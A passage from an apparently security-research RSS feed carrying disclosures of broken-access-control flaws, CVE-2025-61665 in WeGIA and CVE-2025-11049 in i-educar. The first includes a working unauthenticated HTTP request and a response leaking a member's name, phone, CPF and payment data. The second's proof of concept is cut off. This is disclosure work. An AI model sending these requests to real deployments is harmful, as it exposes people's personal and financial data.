&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;cpf&amp;amp;#34;: &amp;amp;#34;649.659.320-56&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;valor_periodo&amp;amp;#34;: &amp;amp;#34;5000.00&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;email&amp;amp;#34;: &amp;amp;#34;teste@teste.com&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;tipo&amp;amp;#34;: &amp;amp;#34;F\u00edsica - Mensal - Boleto&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;status&amp;amp;#34;: &amp;amp;#34;Ativo&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;tag&amp;amp;#34;: &amp;amp;#34;Solicitante&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;}]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61665/image.png&amp;#34;
	width=&amp;#34;1534&amp;#34;
	height=&amp;#34;431&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;355&amp;#34;
		data-flex-basis=&amp;#34;854px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61665-broken-access-control-in-get_relatorios_sociosphp-endpoint&amp;#34;&amp;gt;CVE-2025-61665: Broken Access Control in &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows unauthenticated attackers to directly access sensitive personal and financial information of members without requiring authentication or authorization.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;tipo_socio&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tipo_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;operador&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;valor&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tag&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&amp;amp;amp;tipo_pessoa=x&amp;amp;amp;operador=maior_q&amp;amp;amp;valor=&amp;amp;amp;tag=x&amp;amp;amp;status=x HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;response-snippet&amp;#34;&amp;gt;Response (snippet):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;HTTP/1.1 200 OK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Date: Sun, 31 Aug 2025 20:00:43 GMT
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Server: Apache/2.4.62 (Debian)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Vary: Accept-Encoding
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 204
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Keep-Alive: timeout=5, max=100
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: Keep-Alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/html; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;[{
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;nome&amp;amp;#34;: &amp;amp;#34;Luis Barango&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;telefone&amp;amp;#34;: &amp;amp;#34;(71)98642-1278&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;cpf&amp;amp;#34;: &amp;amp;#34;649.659.320-56&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;valor_periodo&amp;amp;#34;: &amp;amp;#34;5000.00&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;email&amp;amp;#34;: &amp;amp;#34;teste@teste.com&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;tipo&amp;amp;#34;: &amp;amp;#34;F\u00edsica - Mensal - Boleto&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;status&amp;amp;#34;: &amp;amp;#34;Ativo&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;amp;#34;tag&amp;amp;#34;: &amp;amp;#34;Solicitante&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;}]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61665/image.png&amp;#34;
	width=&amp;#34;1534&amp;#34;
	height=&amp;#34;431&amp;#34;
	srcset=&amp;#34;/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;355&amp;#34;
		data-flex-basis=&amp;#34;854px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-62wp-6qmh-6p5f&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 30 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11049</title>
        <link>https://www.cvehunters.com/p/cve-2025-11049/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-11049/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11049-broken-access-control-in-unificacao-aluno-endpoint&amp;#34;&amp;gt;CVE-2025-11049: Broken Access Control in &amp;lt;code&amp;gt;/unificacao-aluno&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11049&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11049&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/unificacao-aluno&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /unificacao-aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11049-broken-access-control-in-unificacao-aluno-endpoint&amp;#34;&amp;gt;CVE-2025-11049: Broken Access Control in &amp;lt;code&amp;gt;/unificacao-aluno&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11049&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11049&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;/unificacao-aluno&amp;lt;/code&amp;gt; endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /unificacao-aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11049/image.png&amp;#34;
	width=&amp;#34;1603&amp;#34;
	height=&amp;#34;673&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11049/image_hu_d7804f71d4cae366.png 480w, /p/cve-2025-11049/image_hu_7e1e16197ca84d77.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;571px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11049/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11049/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-11049/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
